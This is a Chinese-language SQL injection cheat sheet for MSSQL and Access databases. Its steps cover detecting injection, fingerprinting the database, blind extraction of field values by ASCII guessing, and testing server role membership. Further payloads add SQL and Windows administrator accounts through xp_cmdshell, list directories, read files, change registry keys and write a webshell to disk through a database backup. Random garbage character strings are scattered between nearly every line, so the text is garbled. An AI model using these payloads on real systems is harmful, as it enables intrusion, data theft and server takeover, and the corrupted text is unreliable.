1.判断是否有注入;and 1=1 ;and 1=2 #4M0%rN
2.初步判断是否是mssql ;and user>0 Mk[`HEO
YqgW8EM
3.注入参数是字符'and [查询条件] and ''=' k6BgY|0g C
R`q!~8u
4.搜索时没过滤参数的'and [查询条件] and '%25'=' @:B1
\`ReZu$
5.判断数据库系统 qgNK!(kWpr
=6&D4~R
;and (select count(*) from sysobjects)>0 mssql ^q\zC%.
LS'=>s"
;and (select count(*) from msysobjects)>0 access 0
,-b %X
'9@R=#nd
"[yiNJ"kt
vuBA&j0C
6.猜数据库 ;and (select Count(*) from [数据库名])>0 T"U t).
8BDL{?Mu
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Umg81!
WKsx|a]U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 n~j[Pw
Sj?sw]3
9.(1)猜字段的ascii值(access) tpONSRY
<>s\tJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sdQv:nd'R
lvi:I+VgA
(2)猜字段的ascii值(mssql) JB@VP{
W?-BT >#s
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 "M^W:4_
u(702S4
10.测试权限结构(mssql) :g#it@
Z;D3lbqE
uW=NH;u
"~C#DZwt{
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- D|9fHMg%
vWs c{9
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j*d~h$[k
^~ $&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -FV'%X$i
X>7]g670@
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \*aLyyy3
<|3v@
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
@l Gn G
XWpnZFjE
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^1=|(Z/
GK?R76d
;and 1=(select IS_MEMBER('db_owner'));-- pIiED9
+z0}{,HX
4uAafQ`@H
"B3:m-'
11.添加mssql和系统的帐户 yX3H&F6
Ba|}C(Ws?
;exec master.dbo.sp_addlogin username;-- 3z92Gy5cr
;exec master.dbo.sp_password null,username,password;-- % T \N@
sA-W^*+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- U^BXCu1km
2 _n*u^X:_
;exec master.dbo.xp_cmdshell 'net user username password 3Lki7QW`
ok%!o+nk.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ;<@6f @
rq["O/2
;exec master.dbo.xp_cmdshell 'net user username password /add';--
iLcadX
{))S<_yN
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- FNCLGAiZ
UQ])QTrZFi
zB"
`i
Juqn
X
12.(1)遍历目录 e.|RC
}, &,Dt
;create table dirs(paths varchar(100), id int) vx}Z
Gj8[*3d
;insert dirs exec master.dbo.xp_dirtree 'c:\' 8:?Q(M7
|#:dC #
;and (select top 1 paths from dirs)>0
ZHECcPhz
J?quYlS
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) cN}A rv
&d3 '{~:
I@Z*Nu1L
U4l*;od
(2)遍历目录 PJ'lZu8?x
Bi:wP/>v
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- oEoJa:h
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 'oZn<c`
kJi&9
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 tr9Y1vxo{
{-N90Oe
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 pkf OM"5'
2vdQ&H4
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 *a,.E6C*
) v5n "W
7h9[-d6
R|J>8AL}BY
13.mssql中的存储过程 V/9"Xmv75
ro^6:w3O^
xp_regenumvalues 注册表根键, 子键 D4O5@KfL
%iL@:'?K
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 *8X9lv.Z
\.;ct
xp_regread 根键,子键,键值名
G<-9U}~76
yX.5Y|A<
;exec xp_regread ElR&scXi__
+<WRB\W
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 NU&^7[!yl
q\'P1~
xp_regwrite 根键,子键, 值名, 值类型, 值 JRjMt-7H_
C:GHP$/}
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 T~~[a|bLa
z5&%T}$tJ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Ms'TC;&PS
j)tCr Py
xp_regdeletevalue 根键,子键,值名 JlDDM
%
X]pWvQ Q]
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 -8Jl4F ,
UG"6RW @
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 "ex~LB
:7Z\3_D/
R(?<97
Ns|V7|n]
14.mssql的backup创建webshell E7NbPNd
2VV[*QI
use model ,KhMzE8_a
B==a
create table cmd(str image); nze1]3`
g"!#]LLe
insert into cmd(str) values (''); =SK+\j$
[[?[? V ,
backup database model to disk='c:\l.asp'; :
>wQwf
ICl_ eb
o(d_uJOB
zJuRth)(,
15.mssql内置函数 +)JNFy-
'/u:,ar
;and (select @@version)>0 获得Windows的版本号 ;Up'~BP(
3:~l2KIP4
;and user_name()='dbo' 判断当前系统的连接用户是不是sa y@kcXlY
3 $$5Mk(&